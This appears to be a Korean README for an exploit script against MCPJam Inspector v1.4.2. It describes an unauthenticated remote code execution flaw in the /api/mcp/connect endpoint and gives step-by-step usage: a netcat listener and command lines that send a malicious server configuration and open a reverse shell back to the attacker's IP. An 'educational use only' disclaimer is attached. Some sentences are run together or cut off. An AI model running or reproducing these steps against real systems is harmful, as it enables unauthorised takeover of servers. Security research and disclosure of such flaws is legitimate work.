
이 유틸리티는 MCPJam v1.4.2를 포함한 연구 중에 만들어졌습니다. 이 애플리케이션은 서버 구성 객체를 수락하는 API 엔드포인트를 노출합니다. 특정 조건에서 불충분한 검증으로 인해 의도하지 않은 명령 실행이 허용될 수 있습니다.
MCPJam Inspector는 /api/mcp/connect 엔드포인트에 인증되지 않은 원격 코드 실행(RCE) 취약점을 포함하고 있습니다. 이 취약점을 통해 공격자는 악의적인 MCP 서버 구성 페이로드를 전송하여 임의의 명령을 실행할 수 있습니다.
해당 엔드포인트는 command와 args 배열을 포함하는 serverConfig 객체가 포함된 JSON 페이로드를 수락하며, 이는 적절한 검증 또는 정화 없이 시스템에서 직접 실행됩니다.
requests 라이브러리: pip install requestsnetcat 또는 socat터미널 1 - 리스너 시작:
nc -lvnp 4444
터미널 2 - 익스플로잇 실행:
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444
# 기본 (포트 6274, 콜백 포트 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>
# 사용자 지정 MCPJam 포트
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>
# 사용자 지정 리스너 포트
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555
/api/mcp/connect 엔드포인트로 전송합니다.⚠️ 면책 조항:
이 익스플로잇은 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 액세스는 불법입니다. 사용자는 다음에 대해 전적으로 책임을 집니다:
저자는 이 도구의 오용이나 손해에 대한 어떠한 책임도 지지 않습니다. 사용에 따른 위험은 본인이 부담합니다.
/api/mcp/connect